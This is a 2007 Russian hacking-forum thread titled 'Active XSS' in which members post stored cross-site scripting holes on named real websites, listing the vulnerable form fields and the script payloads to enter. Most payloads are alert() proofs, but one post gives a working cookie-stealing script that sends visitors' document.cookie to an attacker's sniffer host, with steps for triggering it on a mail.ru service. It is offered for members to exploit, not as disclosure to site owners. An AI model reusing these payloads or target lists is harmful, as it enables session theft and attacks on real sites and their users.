Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

+toxa+ 18.03.2007 15:08

Активные Xss
 
Тут постим тока активные XSS.

Так же сайт на котором вы нашли xss должен быть более или менее популярным:

1. Он не должен быть расположен на бесплатном хостинге.

2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще.

Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы.

o3,14um 19.03.2007 01:26

Сайт с хак-софтом, там и мой трой лежит))
samouchka.net - когда коммент добавляешь впиши.
<img src=http://samouchka.net/engine/data/emoticons/sad.gif onload=XSS]

freddi 19.03.2007 13:16

www.jjurnal.ru

Довольно популярный жж.
Постим сообщение от анонимного пользователя.
Уязвимо поле "Имя:"
"><script>alert()</script>

Работает в опере и ие.

DimOnOID 19.03.2007 14:25

email.ru

может и было..ибо XSS самая тупая))
..
отправляем письмо ..естестн в html....

Код:

<script>alert()</script>
или
Код:

<img src=javascript:alert()>

Isis 19.03.2007 20:11

serials.softkiller.net
В теме любого кряка пишем камент с хсс
Код:

"><script>alert('xss')</script>

ice1k 19.03.2007 21:29

proplay.ru
 
proplay.ru

Идём в раздел "Команды":
--http://www.proplay.ru/team/
Там создаём новую команду.
Уязвимыми являются поля:
-Игры
-IRC канал
-Домашняя страница

Test:
--http://www.proplay.ru/team/744/

DimOnOID 20.03.2007 23:56

sysadmin.mail.ru

Заходи на sysadmin.mail.ru.....
Сморим *Сервисы Сисадмина* там лезим в *Моя регистрационная анкета*
в поле Крупный город: Выбираем любой город))
далее в поле Свой город/район: строчим
Код:

"><script>img = new Image(); img.src = "http://сайт.ru/сниффер.gif?"+document.cookie;</script>
и жмём Сохранить изменения...
после переходим в Whois ..находим наш город...если в списке ников есть наш ник.....значит куки уже на снифе))ибо ненадо даже давать ссылку на свой профиль...просто на город где ваш логин)) :)

Isis 26.03.2007 11:49

www.qiq.ru
После регистрации, в профиле изменяем уязвимые поля, а именно:
1)Место жительства
2)О себе
А этих местах пишем
Код:

"><script>alert(/xss/)</script>
Пример

Isis 28.03.2007 09:52

ДОМ 3 ХЭК =))))))

dom3mir.ru

Регистрируемся с любыми данными......
Далее идем изменять свою анкету...
В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете
Код:

Москва" onmouseover="alert('xss')"
Далее идете в поиск...ищите себя понику и вот xss =)

n1†R0x 29.03.2007 22:21

http://www.ohizba.ru/index.php?type=page&id=13
уязвимы все поля в гостевой книге
фуфло, но баг..
//updat3:
Код:

http://www.autolider.info/news/main.php?id=108&cpage=1
уязвимость в поле "name" в комментах ;)
извините, редактирование не пашет.. если я что-то нарушил, соедините плз посты :)

запахало)


Время: 20:41